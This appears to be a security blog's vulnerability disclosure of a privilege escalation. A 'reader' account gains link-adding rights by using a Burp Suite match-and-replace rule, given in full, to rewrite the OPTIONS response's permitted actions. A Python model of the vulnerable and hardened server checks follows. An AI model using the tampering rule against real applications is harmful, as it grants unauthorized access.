API Security Blog

Privilege Escalation via edit response body

# Description
Recently, I found a business logic vulnerability that allows a `reader` user to escalate privileges to those of an `allaccess` user. Before the user performs any function, the client sends an `OPTIONS` request and reads the permitted actions for that function from the response body. If the attacker can manipulate the response body, they can modify it and access sensitive functions.

# Step to reproduce
### 1 – User `reader` cannot perform the `Add Link` function.
![image](https://user-images.githubusercontent.com/44127534/174339166-36444512-43a2-42d9-91b2-4c2fcee253ec.png)

### 2 – In `Burp Suite`, go to `Proxy > Options > Match and replace` and click `Add`.
Replace `"actions":{"GET":true}` with `"actions":{"POST":{"pk":{"type":"integer","required":true,"read_only":true,"label":"ID"},"build":{"type":"related field","required":true,"read_only":false,"label":"Build","model":"build","api_url":"/api/build/","filters":{},"help_text":""},"attachment":{"type":"file upload","required":true,"read_only":false,"label":"Attachment","help_text":"Select file to attach"},"link":{"type":"url","required":false,"read_only":false,"label":"Link","help_text":"Link to external URL","max_length":200},"filename":{"type":"string","required":true,"read_only":false,"label":"Filename"},"comment":{"type":"string","required":false,"read_only":false,"label":"Comment","help_text":"File comment","max_length":100},"upload_date":{"type":"date","required":true,"read_only":true,"label":"Upload date","help_text":""},"user":{"type":"related field","required":false,"read_only":false,"label":"User","help_text":"User","model":"user","api_url":"/api/user/","filters":{}},"user_detail":{"type":"nested object","required":true,"read_only":true,"label":"User detail","children":{"pk":{"type":"integer","required":true,"read_only":true,"label":"ID"},"username":{"type":"string","required":true,"read_only":false,"label":"Username","help_text":"Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.","max_length":150},"first_name":{"type":"string","required":false,"read_only":false,"label":"First name","max_length":150,"help_text":""},"last_name":{"type":"string","required":false,"read_only":false,"label":"Last name","max_length":150,"help_text":""},"email":{"type":"email","required":false,"read_only":false,"label":"Email address","max_length":254,"help_text":""}}}},"DELETE":true,"GET":true}`

![image](https://user-images.githubusercontent.com/44127534/174339543-eab507bd-761e-4b8f-b124-404d38d7eb68.png)
And click `OK`.

### 3 – Try the `Add link` function again with the `reader` account, and it succeeds!

![image](https://user-images.githubusercontent.com/44127534/174339730-89920dc0-e0ef-4f51-91a0-67d50204a8da.png)
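As an added illustration (not code from the report or from the affected application), the following Python model shows why the bypass in steps 1–3 works: the `OPTIONS` metadata only drives what the UI renders, so the outcome depends entirely on whether the server re-checks authorization on the `POST` itself. Role names, the permission table and the function names are assumptions.

```python
# Added illustration of the flaw in the report; not the affected application's code.
# Role names, the permission table and the function names are assumptions.
from dataclasses import dataclass

# Server-side permission table (constructed sample): HTTP methods each role may use
# on the attachment/link endpoint.
ROLE_PERMISSIONS = {"reader": {"GET"}, "allaccess": {"GET", "POST", "DELETE"}}


@dataclass
class User:
    name: str
    role: str


def options_metadata(user: User) -> dict:
    """Body of the OPTIONS response: a hint telling the UI which actions to offer."""
    return {"actions": {m: True for m in sorted(ROLE_PERMISSIONS[user.role])}}


def client_add_link(user: User, options_body: dict, server_post):
    """Client flow from the report: read the OPTIONS body, POST only if it lists POST.
    options_body is whatever reached the browser, so an intercepting proxy can rewrite it."""
    if "POST" not in options_body["actions"]:
        return "hidden"  # button not rendered; no POST is ever sent
    return server_post(user, "https://example.test/spec.pdf")


def server_post_vulnerable(user: User, link: str) -> int:
    """Vulnerable handler: the hidden button was the only control, so every POST is accepted."""
    return 201


def server_post_hardened(user: User, link: str) -> int:
    """Hardened handler: authorization is re-evaluated from the authenticated identity on
    the state-changing request itself; what the client saw in OPTIONS is irrelevant."""
    if "POST" not in ROLE_PERMISSIONS[user.role]:
        return 403
    return 201


# OPTIONS body after the Burp match-and-replace rule (field details trimmed).
TAMPERED_OPTIONS = {"actions": {"POST": {"link": {"type": "url"}}, "DELETE": True, "GET": True}}

if __name__ == "__main__":
    reader = User("alice", "reader")
    print(client_add_link(reader, options_metadata(reader), server_post_vulnerable))  # hidden
    print(client_add_link(reader, TAMPERED_OPTIONS, server_post_vulnerable))          # 201
    print(client_add_link(reader, TAMPERED_OPTIONS, server_post_hardened))            # 403
```

The same check makes a good regression test: a `reader` session sending the `POST` directly, regardless of what `OPTIONS` returned, must get a 403.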